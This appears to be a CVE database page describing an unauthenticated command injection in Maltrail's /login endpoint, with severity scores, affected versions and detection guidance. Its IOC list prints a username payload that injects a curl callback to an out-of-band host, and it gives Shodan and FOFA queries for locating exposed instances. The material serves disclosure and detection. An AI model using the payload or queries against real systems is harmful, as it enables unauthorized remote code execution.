cbcvebase.
CVE-2025-34073
published 2025-07-02

CVE-2025-34073: An unauthenticated command injection vulnerability exists in stamparm/maltrail (Maltrail) versions <=0.54. A remote attacker can execute arbitrary operating…

PriorityP181critical10CVSS 4.0
AVNACLATNPRNUINVCHVIHVAHSCHSIHSAHEXCRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUXRXVXREXUX
EXPLOIT
EPSS
3.88%
88.9th percentile
An unauthenticated command injection vulnerability exists in stamparm/maltrail (Maltrail) versions <=0.54. A remote attacker can execute arbitrary operating system commands via the username parameter in a POST request to the /login endpoint. This occurs due to unsafe handling of user-supplied input passed to subprocess.check_output() in core/http.py, allowing injection of shell metacharacters. Exploitation does not require authentication and commands are executed with the privileges of the Maltrail process.

Affected

1 ranges
VendorProductVersion rangeFixed in
stamparmmaltrail<= 0.54

Detection & IOCsextracted from sources · hover to see the quote

url/login
pathcore/http.py
pathmailtrail/core/httpd.py
commandusername=;`curl http://{{interactsh-url}}`
  • Monitor for POST requests to the /login endpoint containing shell metacharacters (e.g., semicolons, backticks, pipes) in the username parameter, which indicate command injection attempts against Maltrail.
  • Use Shodan query `http.title:"Maltrail"` or FOFA query `app="Maltrail"` to identify exposed Maltrail instances potentially vulnerable to this unauthenticated RCE.
  • Detect exploitation by checking HTTP response headers for the presence of 'Maltrail' alongside out-of-band callback activity (HTTP or DNS) triggered from the server, indicating successful command execution.
  • Exploitation does not require authentication; any unauthenticated POST to /login with a crafted username field should be treated as a high-severity alert on Maltrail versions <= 0.54.
  • ·Injected commands execute with the privileges of the Maltrail process, so impact severity depends on the process's OS-level permissions at deployment time.
  • ·The vulnerability affects Maltrail versions <= 0.54; the Metasploit module was specifically validated against versions 0.52 and 0.53, so detections should cover the full affected range.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.